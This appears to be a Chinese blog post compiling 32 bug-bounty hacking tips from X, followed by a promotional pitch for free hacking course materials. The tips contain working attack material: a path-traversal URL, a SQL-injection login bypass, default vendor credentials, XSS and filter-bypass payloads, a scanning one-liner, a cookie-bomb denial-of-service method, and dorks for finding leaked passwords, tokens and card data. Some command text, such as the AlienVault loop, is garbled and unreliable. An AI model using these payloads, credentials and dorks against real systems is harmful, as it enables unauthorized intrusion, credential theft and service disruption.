X上收集的好用的32个渗透测试小技巧:
[ ] Tip 1
Here’s my last finding (P1)1- register account2- intercept request3- here’s the response in image so in “role” parameter we have ROLE_USERSo i don’t know what i can replace it to privilege my account to admin4- open source code and look in js files5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role”6- so i use match and replace to replace value’s7- boom privilege my account to admin account with full control
[ ] Tip 2
اسعد الله ايامكم بكل خير هذا ثغرة في شركة مايكروسوفتكانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS Exploit:https//anywebsite.com/c:/Windows/Win.ini
[ ] Tip 3
CloudFront bypass:⚔️ ">%0D%0A%0D%0A<x '=“foo”> Would be interested to know if this is target specific or other CloudFront websites are vulnerable
[ ] Tip 4
1 : Get all the URL from wayback / Gau 2 : Filter out the js file using httpx 3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension
[ ] Tip 5
target.com/wp-config.php => 404 not foundtarget.com/wp-config.php.… ==> 200 ok and downloaded` `wp-config.php.swp ==>>200 ok ``after that if its contain encoded using hexadecimal decode it .
[ ] Tip 6
try testing for SQLi Authentication Bypass :⚔️username:'--'/"--"password:‘–’/“–”
[ ] Tip 7
default credentials: PSADMIN:PSADMINPS:PSPSEM:PSEMGoogle Dork: intitle:"Oracle+PeopleSoft+Sign-in"Wrote a nuclei template to test all permutations
[ ] Tip 8
nmap -sV -iL host.txt -oN nmap_scan.txtWait a few hourscat nmap_scan.txt | grep open
[ ] Tip 9
https://youtu.be/VsM6ERUx_AA------------------------------------------------------------------------------------Xss payloadhttps://github.com/Aacle/xss_payload------------------------------------------------------------------------------------Use Nuclei for leaked api.$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}------------------------------------------------------------------------------------#Scan through #TORsqlmap -u “http://target_server/” --tor --tor-type=SOCKS5------------------------------------------------------------------------------------Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token,and check access to each repo of main organization ------------------------------------------------------------------------------------ bypass alert ==> [alert][0].call(this,1)------------------------------------------``------------------------------------------
[ ] Tip 10
1_ Go to SHODAN and get the IP2 _ Go to Dirsearch and do a Fuzzing3_ Obtaining sensitive data
[ ] Tip 11
Recon Recon Recon!!Shodan Dorking Always wins. ssl:"Company Inc"` `Filter results by http title.Start fuzzing an interesting asset.Found swagger-ui/` `Tried swagger ui xss withhttps://github.com/seanmarpo/webjars-swagger-xss
[ ] Tip 12
Have you ever heard about wc-db file disclosure?! > you can check it by: https://target[.]com/.svn/wc.db > then you can use this tool to dump all of the website source code https://github.com/anantshri/svn-extractor
[ ] Tip 13
- Shodan Dork -> Some Assets.
2. Fuzzing & got 403 Forbidden on /config dir.3. Fuzzing on /config/FUZZ and getting some config files.``4. Same pattern and it works on another asset.
[ ] Tip 14
` `
Default Credentials admin:admin- shodan dork :- ssl:“target[.]com” 200 http.title:“dashboard”
[ ] Tip 15
A quick thread about JIRA misconfiguration that I tried today.
3. Google dorks to find jira dashboards.`` ``inurl:/ConfigurePortalPages!default.jspa?view=popular4. Google dork to find jira filters page.
inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )
[ ] Tip 16
- Google dork to find the exposed user list. inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log
[ ] Tip 17
`GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information dork: "org:company extension:csv admin" leak: "cc number, cvv, email, phone number"`
[ ] Tip 18 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:
cat targets | waybackurls | anew | grep “=” | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403
[ ] Tip 19
Tip : “GET request for XML not found” changes the request to POST with XXE payload
[ ] Tip 20 Extract Juicy Info From AlienVault
for sub in ( c a t H O S T S . t x t ) ; d o g r o n " h t t p s : / / o t x . a l i e n v a u l t . c o m / o t x a p i / i n d i c a t o r / h o s t n a m e / u r l l i s t / (cat HOSTS.txt); do gron “https://otx.alienvault.com/otxapi/indicator/hostname/url_list/ (catHOSTS.txt);dogron"https://otx.alienvault.com/otxapi/indicator/hostname/urllist/sub?limit=100&page=1” | grep “\burl\b” | gron --ungron | jq | egrep -wi ‘url’ | awk ‘{print $2}’ | sed ‘s/"//g’| sort -u | tee -a OUT.txt ;done
[ ] Tip 21 bypass PHPMYADMIN
phpmyadmin =>301PHPmyadmin =>200PHPMYadmin =>200PHPMYADMIN =>200phpMYadmin =>200``phpmyAdmin =>200
[ ] Tip 22 SVN
- ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/3. clone & use https://github.com/anantshri/svn-extractor4. ./svn-extractor.py --url http://url.com --match database.php5. result in output dir and just open it
[ ] Tip 23 xss
in :firstname:<img src=xmiddlename:onerrorlastname:=alert(domain)/> ==========================1:- Use https://github.com/Leoid/MatchandReplace2:- Import to burpsuite match and replace.3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:80804:- The Blind xss payload will added automatically by burp and gospider.Finally:- 4 BLIND XSS REPORTS.``
[ ] Tip 24 Cookie Bomb
URL that causes the cookie length to exceed request header limits for all requests until the cookie expires.1. Find a Cookie set by a parameter2. Inject as many commas as you can into the parameter until you DoS that user
[ ] Tip 25 xss via jwt
- Make a jwt token and insert a xss paylaod.``2. The final url is like url/dest?jwt=vulnerable-jwt-token. (jwt= paramter was decoding the provided jwt token and show’s it into the page).
[ ] Tip 26 Getting Private Information URLs by curling
- Grab all URLs from your target which you think hard to hunt or test or static
2. Save all files in any.txt` `3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done4. All curled response grep for followingKeywords:drive. googledocs. google/spreadsheets/d//document/d/NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later``You will get URLs includes juicy information
[ ] Tip 26 Injecting Payload In Phone Numbers field
https://twitter.com/Pwn2arn/status/1609146484263641089
[ ] Tip 27 Easy P1 upside_down_face
1: Collect all the Js files by using the developer tool on mozila``2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 3: Now check manually sensitive keyword js file
[ ] Tip 28 Tips for my last P1 :
1 - Found dev portal for developing require Basic Auth 2 - search in GitHub “domain” docker``3- found a user try to pull the privite repository and passing the username:pass 4 - Decode Base64 Basic Auth 5 - Logged in and full access on all Prod
[ ] Tip 29 Github leak for Aws,jira,okta etc
- Org:“target” pwd/pass/passwd/password
2. "target. atlassian" pwd/pass/passwd/password3. “target. okta” pwd/pass/passwd/password``4. “Jira. target” pwd/pass/passwd/password
[ ] Tip 30 soucremap js
https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959fhttps://github.com/rarecoil/unwebpack-sourcemap
[ ] Tip 31 if a site uses AngularJS,
test {{7*7}} to see whether 49 is rendered anywhere.If the application is built with ASP.NET with XSS protectionenabled, you might want to focus on testing other vulnerabilitytypes first and check for XSS as a last resort. AngularJS Client-Side Template Injectionhttps://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE``
[ ] Tip 32 If a site is built with Rails,
you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where theRECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the patternwww.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing``insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook.
题外话
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。
扫一扫
4953
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
